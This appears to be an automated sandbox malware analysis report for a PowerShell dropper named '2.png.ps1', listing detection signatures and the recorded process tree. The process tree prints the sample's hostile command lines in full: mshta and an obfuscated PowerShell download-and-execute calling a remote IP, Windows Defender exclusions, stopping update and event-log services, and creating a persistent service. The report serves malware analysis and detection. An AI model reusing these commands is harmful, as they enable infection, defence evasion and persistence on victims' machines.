Edit tour
Windows
Analysis Report
2.png.ps1
Overview
General Information
| Sample name: | 2.png.ps1 |
| Analysis ID: | 1577477 |
| MD5: | c35d55fed56f234ddd8df704aabe7d3d |
| SHA1: | cc3c66fa513272688501de6e4b5e172024f14bc3 |
| SHA256: | 7ec87fed141de98f1906de8bd3d4e08d13f69a633fe52608bbf7c06b181292d9 |
| Tags: | bulletproofps1user-abus3reports |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Potential malicious VBS script found (suspicious strings)
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
powershell.exe (PID: 7612 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\2.p ng.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7620 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 7868 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\CMD.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7916 cmdline:
"C:\Window s\System32 \cmd.exe" /c mshta h ttp://176. 113.115.17 8/Windows- Update MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
mshta.exe (PID: 7960 cmdline: mshta http ://176.113 .115.178/W indows-Upd ate MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 8136 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='%%(N% %ew-O%%%bj e%%%ct N%% %et.W%%%e' ; $c4='b%% Cl%%%%ie%% nt%%).%%%D %%%ow%nl%% o%%'; $c3= 'a%%dSt%%% %ri%%%%%n% %%g(''http ://176.113 .115.178/F F/1.png'') ';$TC=($c1 ,$c4,$c3 - Join '');$ TC=$TC.rep lace('%',' ');I`E`X $ TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6988 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h c:\ MD5: 04029E121A0CFA5991749937DD22A1D9) 
LB31.exe (PID: 2072 cmdline: "C:\Users\ user\AppDa ta\Roaming \LB31.exe" MD5: C9E6AA21979D5FC710F1F2E8226D9DFE) - powershell.exe (PID: 2292 cmdline:
C:\Windows \system32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amData) -E xclusionEx tension '. exe' -Forc e MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7876 cmdline:
C:\Windows \system32\ cmd.exe /c wusa /uni nstall /kb :890830 /q uiet /nore start MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wusa.exe (PID: 5508 cmdline: wusa /unin stall /kb: 890830 /qu iet /nores tart MD5: FBDA2B8987895780375FE0E6254F6198) 
sc.exe (PID: 7888 cmdline: C:\Windows \system32\ sc.exe sto p UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 748 cmdline:
C:\Windows \system32\ sc.exe sto p WaaSMedi cSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 3564 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 2728 cmdline:
C:\Windows \system32\ sc.exe sto p wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 1404 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 4516 cmdline:
C:\Windows \system32\ sc.exe sto p bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 4580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7708 cmdline:
C:\Windows \system32\ sc.exe sto p dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7804 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7840 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7852 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7656 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 4864 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
dialer.exe (PID: 7616 cmdline: C:\Windows \system32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) 
winlogon.exe (PID: 584 cmdline: winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - lsass.exe (PID: 640 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 928 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 992 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 436 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 376 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1028 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1036 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1124 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1148 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1160 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1220 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1336 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1348 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s DispBr okerDeskto pSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1392 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s EventS ystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - sc.exe (PID: 4980 cmdline:
C:\Windows \system32\ sc.exe del ete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 4332 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7992 cmdline:
C:\Windows \system32\ sc.exe cre ate "LIB" binpath= " C:\Program Data\Mig\M ig.exe" st art= "auto " MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 2216 cmdline:
C:\Windows \system32\ sc.exe sto p eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 5476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 1872 cmdline:
C:\Windows \system32\ sc.exe sta rt "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 5128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 8128 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Mig.exe (PID: 6156 cmdline:
C:\Program Data\Mig\M ig.exe MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Change of critical system settings |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||
| Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Source: | Author: vburov: | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 43_2_000001F385BCDCE0 | |
| Source: | Code function: | 49_2_000002A29199DCE0 | |
| Source: | Code function: | 50_2_0000014E25EDDCE0 | |
| Source: | Code function: | 51_2_00000283E133DCE0 | |
| Source: | Code function: | 52_2_000001FB539CDCE0 | |
| Source: | Code function: | 53_2_000001CBD8BDDCE0 | |
| Source: | Code function: | 54_2_000001F2BD16DCE0 | |
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Image file has PE prefix: | ||